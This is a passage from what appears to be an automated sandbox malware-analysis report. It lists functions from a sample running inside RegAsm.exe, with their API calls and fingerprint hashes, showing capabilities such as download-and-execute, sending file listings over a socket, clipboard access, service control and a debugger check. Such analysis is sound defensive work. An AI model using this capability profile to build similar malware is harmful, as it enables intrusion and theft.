                                                                                              • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                                                              • Opcode Fuzzy Hash: 403e8f00e880f72b82558a69448ef6646ea8491fdd4c1094c816304795b95f0e
                                                                                              • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                                                              Function 0041AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                              • String ID:
                                                                                              • API String ID: 276877138-0
                                                                                              • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                              • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                                                              • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                                                              • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                                                              Function 004524BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                                                              • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                                                              • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID: ACP$OCP
                                                                                              • API String ID: 2299586839-711371036
                                                                                              • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                              • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                                              • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                              • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                                              Function 0041B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F419,00000000), ref: 0041B54A
                                                                                              • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                                              • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                                              • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                              • String ID: SETTINGS
                                                                                              • API String ID: 3473537107-594951305
                                                                                              • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                              • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                                                              • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                              • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                                                              Function 004096A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 004096A5
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find$File$CloseFirstH_prologNext
                                                                                              • String ID:
                                                                                              • API String ID: 1157919129-0
                                                                                              • Opcode ID: d0906240c61558a8c2233d1a994a81c018a8f0e86e731917b8a7b38e081808ba
                                                                                              • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                                                              • Opcode Fuzzy Hash: d0906240c61558a8c2233d1a994a81c018a8f0e86e731917b8a7b38e081808ba
                                                                                              • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                                              Function 00408847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0040884C
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                              • String ID:
                                                                                              • API String ID: 1771804793-0
                                                                                              • Opcode ID: 2aff72510e3da79c4ec0127435383929a3d65dfb18998d25a11cc0f49d42b15d
                                                                                              • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                                                              • Opcode Fuzzy Hash: 2aff72510e3da79c4ec0127435383929a3d65dfb18998d25a11cc0f49d42b15d
                                                                                              • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                                                              Function 00406EEB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DownloadExecuteFileShell
                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                                              • API String ID: 2825088817-3056885514
                                                                                              • Opcode ID: 14d515712c480217838e231454ab8fe5270dd457330ce9c1c521e9db2fcb2fa2
                                                                                              • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                                                              • Opcode Fuzzy Hash: 14d515712c480217838e231454ab8fe5270dd457330ce9c1c521e9db2fcb2fa2
                                                                                              • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                                                              Function 00407877 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileFind$FirstNextsend
                                                                                              • String ID: XPG$XPG
                                                                                              • API String ID: 4113138495-1962359302
                                                                                              • Opcode ID: 8b82f26417c5a20b2dc32c780ef94423479af1bd0b377172bfd4f7f9b20789dd
                                                                                              • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                                                              • Opcode Fuzzy Hash: 8b82f26417c5a20b2dc32c780ef94423479af1bd0b377172bfd4f7f9b20789dd
                                                                                              • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                                                              Function 0041CA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                                • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                              • API String ID: 4127273184-3576401099
                                                                                              • Opcode ID: 0770bf726c9befaa45485f0dd67d4366664ca8a7637528448030d37bd09e249f
                                                                                              • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                                              • Opcode Fuzzy Hash: 0770bf726c9befaa45485f0dd67d4366664ca8a7637528448030d37bd09e249f
                                                                                              • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                                              Function 0045201B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                              • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                              • String ID: p'E$JD
                                                                                              • API String ID: 1084509184-908320845
                                                                                              • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                              • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                                                              • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                                                              • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                                              Function 00452143 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2829624132-0
                                                                                              • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                              • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                                              • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                              • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                                                              Function 0043BB71 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID:
                                                                                              • API String ID: 3906539128-0
                                                                                              • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                              • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                                                                              • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                                                                              • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                                                                              Function 00443355 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                                              • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                                              • ExitProcess.KERNEL32 ref: 0044338F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                              • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                                              • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                              • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                                              Function 0040B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Clipboard$CloseDataOpen
                                                                                              • String ID:
                                                                                              • API String ID: 2058664381-0
                                                                                              • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                              • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                                              • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                                                                              • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                                              Function 0044E8F9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .
                                                                                              • API String ID: 0-248832578
                                                                                              • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                              • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                                                                              • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                                                                              • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                                                                              Function 004520B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                              • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                              • String ID: JD
                                                                                              • API String ID: 1084509184-2669065882
                                                                                              • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                              • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                                                              • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                                                                              • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                                              Function 0044896D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID: GetLocaleInfoEx
                                                                                              • API String ID: 2299586839-2904428671
                                                                                              • Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                                                              • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                                                              • Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
                                                                                              • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                                                              Function 00451D58 Relevance: 3.2, APIs: 2, Instructions: 236COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                                                              • String ID:
                                                                                              • API String ID: 1661935332-0
                                                                                              • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                              • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                                                                              • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                                                                              • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                                                                              Function 004120B2 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00412129
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Heap$FreeProcess
                                                                                              • String ID:
                                                                                              • API String ID: 3859560861-0
                                                                                              • Opcode ID: 5801a203d1619bed6c8a9db4d4e6f7c09651a2c1722533c7d7743465b50f68e9
                                                                                              • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                                                                              • Opcode Fuzzy Hash: 5801a203d1619bed6c8a9db4d4e6f7c09651a2c1722533c7d7743465b50f68e9
                                                                                              • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                                                                              Function 00434CB6 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00434CCF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FeaturePresentProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 2325560087-0
                                                                                              • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                              • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                                                              • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                              • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                                                              Function 00452393 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                                              Memory Dump Source
